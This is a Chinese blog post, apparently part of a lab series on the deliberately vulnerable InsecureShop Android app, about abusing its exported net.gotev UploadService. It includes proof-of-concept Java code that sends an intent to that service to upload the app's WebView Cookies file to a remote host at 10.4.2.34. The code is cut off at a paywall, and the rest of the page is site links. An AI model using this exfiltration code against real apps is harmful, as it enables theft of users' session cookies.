【Android安全】insecureshop漏洞挖掘-中

已于 2023-11-24 20:22:13 修改
阅读量68 收藏 1
点赞数
分类专栏: app安全 文章标签: android 安全
于 2023-11-21 18:27:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tyty2211/article/details/134309795
版权

目录

漏洞#6 -使用已知漏洞的组件

1.分析源码
AndroidManifest.xml中net.gotev.uploadservice.UploadService是可导出的
在这里插入图片描述

分析UploadService.class

判断传递的intent,其action是否等于net.gotev.uploadservice.action.upload
在这里插入图片描述
在这里插入图片描述
这里后面有些忘记截图,暂时未补

漏洞利用-编写源码

这里踩了很多坑,主要原因是对android依赖配置导入不熟悉

1.导入net.gotev.uploadservice库
搜索可用的版本
https://central.sonatype.com/artifact/net.gotev/uploadservice/4.9.0/overview

insecureshop使用的net.gotev.uploadservice版本是3.2.3,为什么这里poc中不用3.2.3呢,因为现在这个版本不可用,相邻版本只有3.3和3.2.1,由于3.3版本与3.2.3某些实现方法不同,这里使用3.2.1版本

编译配置语言,确保使用的是Groovy DSL,而不是Kotlin DSL,因为在使用Kotlin DSL后,在导入相关依赖后,总是出现各种报错,(当然或许是自己不熟悉依赖冲突配置导致)在这里插入图片描述

打开项目的buid.gradle,在dependencies下添加依赖

implementation 'net.gotev:uploadservice:3.2.1'
  1. 编写源码

MainActivity

UploadTaskParameters params = new UploadTaskParameters();
params.setId("1236");
params.setServerUrl("http://10.4.2.34:8000/1.txt");
try {
   
    params.addFile(new UploadFile("/data/data/com.insecureshop/app_webview/Cookies"));

}
catch(FileNotFoundException e) {
   
    throw new IllegalStateException(e); /* should be never thrown because not checked on the client side */
}

Intent intent = new Intent("net.gotev.uploadservice.action.upload");
intent.setClassName("com.insecureshop", "net.gotev.uploadservice.UploadService");
intent.putExtra("taskClass", "net.gotev.uploadservice.MultipartUploadTask");
intent.putExtra("multipartU
最低0.47元/天 解锁文章
tyty2211
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Andorid之提示java.lang.RuntimeException: Unable to start service net.gotev.uploadservice.UploadService@
码莎拉蒂
04-15 3550
1 问题 用android-upload-service上传一个文件提示错误如下 04-15 17:46:33.245 24932 24932 E AndroidRuntime: Process: com.appsinnova.android.keepshare, PID: 24932 04-15 17:46:33.245 24932 24932 E AndroidRuntime: java...
安全分析」浅析Android平台漏洞挖掘 - 信息安全.zip
11-27
安全分析」浅析Android平台漏洞挖掘 - 信息安全 自动化 金融安全 DDoS NGFW 信息安全
Android Oreo requires a notification configuration for the service to run.
weixin_40119478的博客
09-13 221
我在上传图片是遇到了这个问题,我调用的是一个开源库的包, net.gotev:uploadservice:3.4.2 本来还是可以上传图片的,我升级了一下这个包,就不能上传图片报这个错误 java.lang.IllegalArgumentException: Android Oreo requires a notification configuration for the servic...
浅析Android平台漏洞挖掘.pdf
08-07
目录 Android平台漏洞综述 Android平台下的漏洞缓释技术 应用层漏洞挖掘 系统层漏洞挖掘
Android安全漏洞挖掘技术综述
03-31
安全漏洞在 Android系统的安全处于核心地位,因此如何有效挖掘 Android系统安全 漏洞,已成为增强移动终端安全性、保护用户安全和隐私的重要技术手段,具有重要的理论和现实 意义.首先对 ...
Android安全漏洞挖掘技术综述.pdf
09-21
Android 安全漏洞挖掘技术是 Android 应用开发过程不可或缺的一部分。随着 Android 设备和应用的普及, Android 安全漏洞挖掘技术变得越来越重要。在 Android 应用开发安全漏洞挖掘技术是保护用户隐私和数据...
【推荐】网络安全漏洞挖掘实践合集.zip
09-03
推荐,网络安全漏洞挖掘实践合集,仅供大家学习参阅,包含内容如下: 针对现实应用的文本对抗攻击研究 安全众测下的漏洞发展新趋势 安卓应用漏洞挖掘 从0到1-发现与拓展攻击面 对基于Git的版本控制...
【Web】LitCTF 2024 题解(全)
uuzeray的博客
07-25 496
file:///flag直接读本地文件。参考ctfshow web57。访问./dollar.php。以xml形式传数据,打xxe。{{7*7}}测出SSTI。随便找个payload打了。随便试一试,一眼ssrf。目录穿越拿到flag。
Android】广播机制
2301_79977698的博客
07-24 825
Android,广播(Broadcast)是一种消息,任何应用程序都可以发送广播消息,任何应用程序也都可以接收广播消息。广播通常用于通知应用程序某些事件的发生,比如系统启动、电量低、网络状态改变等。Broadcast Receiver(广播接收器):用于接收广播消息并响应这些消息的组件。Intent(意图):用于传递广播消息的数据结构。标准广播(Normal Broadcast)是完全异步的,所有接收器几乎同时接收广播,并且接收顺序是不确定的。
蚂蚁集团Android一面凉经(2024)
最新发布
景叁的专栏
07-25 404
笔者作为一名双非二本毕业7年老Android, 最近面试了不少公司, 目前已告一段落, 整理一下各家的面试问题, 打算陆续发布出来, 供有缘人参考。今天给大家带来的是《蚂蚁集团Android一面凉经(2024)》。
Android笔试面试题AI答之Android系统与综合类(1)
学无止境,止于至善
07-25 907
答案仅供参考,来着文心一言、Kimi.ai。
Unity Android接入SDK 遇到的问题
qq_37672438的博客
07-25 938
所以获取gradle.properties 文件的位置的时候,2019之后要返回上一级再获取,即:/Temp/ gradleout/unityLibrary/../gradle.properties。其实就是gradle版本太低了,升级下gradle,会自动的去升级kotlin,也就是升级Android studio或者idea。之后变成了/Temp/ gradleout/unityLibrary。下载jd_gui 工具 ,或者 idea 下载jd 插件,为/Temp/ gradleout。
Android 通过接收广播int值来控制GPS开关
qq_46687516的博客
07-25 752
Override} else {try {
Android SurfaceFlinger——GraphicBuffer内存申请(三十)
小旭的专栏
07-24 1238
Android的图形子系统,GraphicBufferAllocator 和 GraphicBufferMapper 是处理图形缓冲区的核心组件。这两个类分别负责缓冲区的分配和映射,是 GraphicBuffer 类的基础,GraphicBuffer 用于封装和管理图形数据。
DASCTF-BabyAndroid
Nike_name的博客
07-24 409
jpg隐藏解密函数,native层余弦变换什么什么的
android前台服务
fumeidonga的博客
07-25 1001
关于作者:CSDN内容合伙人、技术专家, 从零开始做日活千万级APP。专注于分享各领域原创系列文章 ,擅长java后端、移动开发、商业变现、人工智能等,希望大家多多支持。未经允许不得转载。
Android APK混淆处理方案分析
qq_38794072的博客
07-24 861
提供apk给到外部,外部对apk进行二次处理后重新给我们一个新apk。尝试分析源apk文件和处理后的apk文件区别,根据其区别推测外部的混淆处理方案,尽可能还原外部对apk的处理方式。以下对处理和未处理的apk文件用新、旧apk名称表示。通过反编译工具分析可以得出外部处理的新 app 操作主要是对 dex 文件增加了垃圾代码提高主包的相似度,避免被Google识别,然后进行了混淆处理。处理 dex 利用 BlackObfuscator-GUI 等工具处理后对 apk。
使用脚本搭建MySQL数据库基础环境
m0_73949379的博客
07-24 393
在这上面需要有一个关于MySQL的一个包mysql-5.7.28-linux-glibc2.12-x86_64.tar.gz。这就是一整个脚本编译过程。
BUUCTF [MRCTF2020]Ezpop
weixin_73399382的博客
07-24 697
b->source->str = $c$b->source已经成为一个新的Show实例对象,通过该对象访问str,为其赋值为$c(Test类的对象),又因为Test类访问不到source资源从而触发get方法。$b->source = new Show()因为通过$b这个对象进行访问的,所以需要source赋值一个新的Show对象,用来触发__toString方法。$c->p = $a将Test的p赋值为一个Modify对象,用来触发invoke方法。得到一串base64。
深度解析:Android平台漏洞挖掘与利用技术
"Android平台漏洞挖掘与利用是IT安全领域的一个重要话题,涉及到Android设备的安全性,特别是关于如何提升权限的ROOT工具。本资源由奇虎360的高级安全研究员吴家志博士讲解,他同时也是C0RET团队的创始成员,专注...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值